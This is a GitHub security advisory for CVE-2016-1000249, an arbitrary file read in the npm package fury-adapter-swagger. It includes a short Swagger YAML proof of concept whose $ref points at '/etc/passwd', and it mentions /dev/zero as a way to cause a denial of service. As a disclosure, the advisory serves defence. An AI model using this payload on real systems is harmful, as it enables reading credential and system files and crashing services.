GHSA-2r7f-4h2c-5x73

Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2r7f-4h2c-5x73/GHSA-2r7f-4h2c-5x73.json
Aliases
  • CVE-2016-1000249
Published
2020-09-01T16:38:33Z
Modified
2022-08-03T23:23:11Z
Details

fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.

Proof of Concept:

---
swagger: '2.0'
info:
  title: Read local files
  version: '1.0'

paths:
  /foo:
    get:
      responses:
        200:
          description: Some description
          examples:
            text/html:
              example:
                $ref: '/etc/passwd'

Recommendation

Upgrade to version 0.9.7 or later.

References

Affected packages

npm / fury-adapter-swagger

fury-adapter-swagger

Affected ranges

Type
SEMVER
Events
Introduced
0.2.0
Fixed
0.9.7

Affected versions